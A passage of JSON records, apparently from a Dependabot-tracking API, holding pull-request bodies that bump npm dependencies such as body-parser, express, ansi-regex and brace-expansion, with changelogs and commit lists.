issue!\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove redundant depth check by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/538\"\u003eexpressjs/body-parser#538\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js v23 by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/553\"\u003eexpressjs/body-parser#553\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: restore CI for 1.x branch by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/665\"\u003eexpressjs/body-parser#665\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@^6.14.0 by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/664\"\u003eexpressjs/body-parser#664\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation and update certain dependencies by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/668\"\u003eexpressjs/body-parser#668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: remove SECURITY.md by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/669\"\u003eexpressjs/body-parser#669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add CodeQL (SAST) by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/670\"\u003eexpressjs/body-parser#670\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.4 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/672\"\u003eexpressjs/body-parser#672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eImportant\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIMPORTANT:\u003c/strong\u003e The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e). \u003ca href=\"https://github.com/expressjs/body-parser/blob/17529513673e39ba79886a7ce3363320cf1c0c50/README.md#depth\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: add support for OSSF scorecard reporting by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: fix errors in ci github action for node 8 and 9 by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/523\"\u003eexpressjs/body-parser#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pin to node@22.4.1 by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/527\"\u003eexpressjs/body-parser#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.12.3 by \u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OSSF Scorecard badge by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinter by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.3 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/535\"\u003eexpressjs/body-parser#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/blob/1.20.5/HISTORY.md\"\u003ebody-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.20.5 / 2026-04-24\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction\u003c/li\u003e\n\u003cli\u003efix: extended urlencoded parsing of arrays with \u0026gt;100 elements (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.4 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@~6.14.0\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: http-errors@~2.0.1\u003c/li\u003e\n\u003cli\u003edeps: raw-body@~2.5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.3 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.2 / 2023-02-21\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.1 / 2022-10-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.11.0\u003c/li\u003e\n\u003cli\u003eperf: remove unnecessary object clone\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.0 / 2022-04-02\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix error message for json parse whitespace in \u003ccode\u003estrict\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix internal error when inflated body exceeds limit\u003c/li\u003e\n\u003cli\u003ePrevent loss of async hooks context\u003c/li\u003e\n\u003cli\u003ePrevent hanging when request already read\u003c/li\u003e\n\u003cli\u003edeps: depd@2.0.0\n\u003cul\u003e\n\u003cli\u003eReplace internal \u003ccode\u003eeval\u003c/code\u003e usage with \u003ccode\u003eFunction\u003c/code\u003e constructor\u003c/li\u003e\n\u003cli\u003eUse instance methods on \u003ccode\u003eprocess\u003c/code\u003e to check for listeners\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: http-errors@2.0.0\n\u003cul\u003e\n\u003cli\u003edeps: depd@2.0.0\u003c/li\u003e\n\u003cli\u003edeps: statuses@2.0.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: on-finished@2.4.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.10.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/0defdbe7f95ad0d3bc007d3a7c59c8c0ab9e6575\"\u003e\u003ccode\u003e0defdbe\u003c/code\u003e\u003c/a\u003e release(patch): 1.20.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/cd0e7a000c53e7be7262d303e57a352b6a00db7f\"\u003e\u003ccode\u003ecd0e7a0\u003c/code\u003e\u003c/a\u003e deps(qs): bump qs to 6.15.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6f24d7e8bcd9860b136920926ce86da1a7dd1d51\"\u003e\u003ccode\u003e6f24d7e\u003c/code\u003e\u003c/a\u003e fix: correct off-by-one error in parameterCount (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/716\"\u003e#716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/b849bd533d8b4abf5576a3e301f28d9befa05ddd\"\u003e\u003ccode\u003eb849bd5\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.1 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/690\"\u003e#690\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/2c55e2f712f320a8e8d0f9fcb1d06526d0e401c9\"\u003e\u003ccode\u003e2c55e2f\u003c/code\u003e\u003c/a\u003e refactor(json): simplify strict mode error string construction (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/692\"\u003e#692\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/7db202cac84a001e6566c2dc6516b44db98beff3\"\u003e\u003ccode\u003e7db202c\u003c/code\u003e\u003c/a\u003e 1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/d8f8adb898676dfdf997b4455e5f9b689b53e989\"\u003e\u003ccode\u003ed8f8adb\u003c/code\u003e\u003c/a\u003e ci: add CodeQL (SAST) (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6d133c19b3e7c0bb8301959ca1dba283d23d23c3\"\u003e\u003ccode\u003e6d133c1\u003c/code\u003e\u003c/a\u003e chore: remove SECURITY.md (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/669\"\u003e#669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/fcd15355041ada6f37288dd13858d50429016b66\"\u003e\u003ccode\u003efcd1535\u003c/code\u003e\u003c/a\u003e deps: use tilde notation and update certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/668\"\u003e#668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ec5fa290d25d85e0049757e240249072331eaee6\"\u003e\u003ccode\u003eec5fa29\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/664\"\u003e#664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.19.0...1.20.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for body-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.17.1 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from ...\n\n_Description has been truncated_","html_url":"https://github.com/SherfeyInv/updater-action/pull/43","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/SherfeyInv%2Fupdater-action/issues/43","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/43/packages"}},{"old_version":"2.17.0","new_version":"removed","update_type":null,"path":null,"pr_created_at":"2026-04-18T23:45:07.000Z","version_change":"2.17.0 → removed","issue":{"uuid":"4289497699","node_id":"PR_kwDOEitXEs7TpsXW","number":7612,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 3 directories with 19 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-04-19T00:52:52.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-18T23:45:07.000Z","updated_at":"2026-04-19T00:53:01.000Z","time_to_close":4065,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":19,"packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"removed","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"ansi-regex","old_version":"3.0.0","new_version":"3.0.1","repository_url":"https://github.com/chalk/ansi-regex"},{"name":"ansi-regex","old_version":"5.0.0","new_version":"5.0.1","repository_url":"https://github.com/chalk/ansi-regex"},{"name":"ansi-regex","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/chalk/ansi-regex"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"debug","old_version":"4.2.0","new_version":"4.3.1","repository_url":"https://github.com/debug-js/debug"},{"name":"flatted","old_version":"2.0.2","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 7 updates in the /.automation/test/repository_osv_scanner/bad directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `removed` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `3.0.0` | `3.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `5.0.0` | `5.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `4.1.0` | `4.1.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [debug](https://github.com/debug-js/debug) | `4.2.0` | `4.3.1` |\n| [flatted](https://github.com/WebReflection/flatted) | `2.0.2` | `3.4.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 7 updates in the /.automation/test/repository_grype/bad directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `removed` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `3.0.0` | `3.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `5.0.0` | `5.0.1` |\n| [ansi-regex](https://github.com/chalk/ansi-regex) | `4.1.0` | `4.1.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [debug](https://github.com/debug-js/debug) | `4.2.0` | `4.3.1` |\n| [flatted](https://github.com/WebReflection/flatted) | `2.0.2` | `3.4.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 3 updates in the /.automation/test/repository_syft directory: [ansi-regex](https://github.com/chalk/ansi-regex), [diff](https://github.com/kpdecker/jsdiff) and [word-wrap](https://github.com/jonschlinkert/word-wrap).\n\nRemoves `@octokit/plugin-paginate-rest`\n\nRemoves `@tootallnate/once`\n\nUpdates `ansi-regex` from 3.0.0 to 3.0.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/f545bdb80048f527889eddb9ac1a851c6f2a2241\"\u003e\u003ccode\u003ef545bdb\u003c/code\u003e\u003c/a\u003e 3.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/c57d4c2fdbe0357a0f6dd42d1160defdc9fffdf5\"\u003e\u003ccode\u003ec57d4c2\u003c/code\u003e\u003c/a\u003e fix a few old XO issues for backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1\"\u003e\u003ccode\u003e419250f\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS (\u003ca href=\"https://redirect.github.com/chalk/ansi-regex/issues/37\"\u003e#37\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chalk/ansi-regex/compare/v3.0.0...v3.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ansi-regex` from 5.0.0 to 5.0.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/f545bdb80048f527889eddb9ac1a851c6f2a2241\"\u003e\u003ccode\u003ef545bdb\u003c/code\u003e\u003c/a\u003e 3.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/c57d4c2fdbe0357a0f6dd42d1160defdc9fffdf5\"\u003e\u003ccode\u003ec57d4c2\u003c/code\u003e\u003c/a\u003e fix a few old XO issues for backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1\"\u003e\u003ccode\u003e419250f\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS (\u003ca href=\"https://redirect.github.com/chalk/ansi-regex/issues/37\"\u003e#37\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chalk/ansi-regex/compare/v3.0.0...v3.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ansi-regex` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/f545bdb80048f527889eddb9ac1a851c6f2a2241\"\u003e\u003ccode\u003ef545bdb\u003c/code\u003e\u003c/a\u003e 3.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/c57d4c2fdbe0357a0f6dd42d1160defdc9fffdf5\"\u003e\u003ccode\u003ec57d4c2\u003c/code\u003e\u003c/a\u003e fix a few old XO issues for backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1\"\u003e\u003ccode\u003e419250f\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS (\u003ca href=\"https://redirect.github.com/chalk/ansi-regex/issues/37\"\u003e#37\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chalk/ansi-regex/compare/v3.0.0...v3.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca 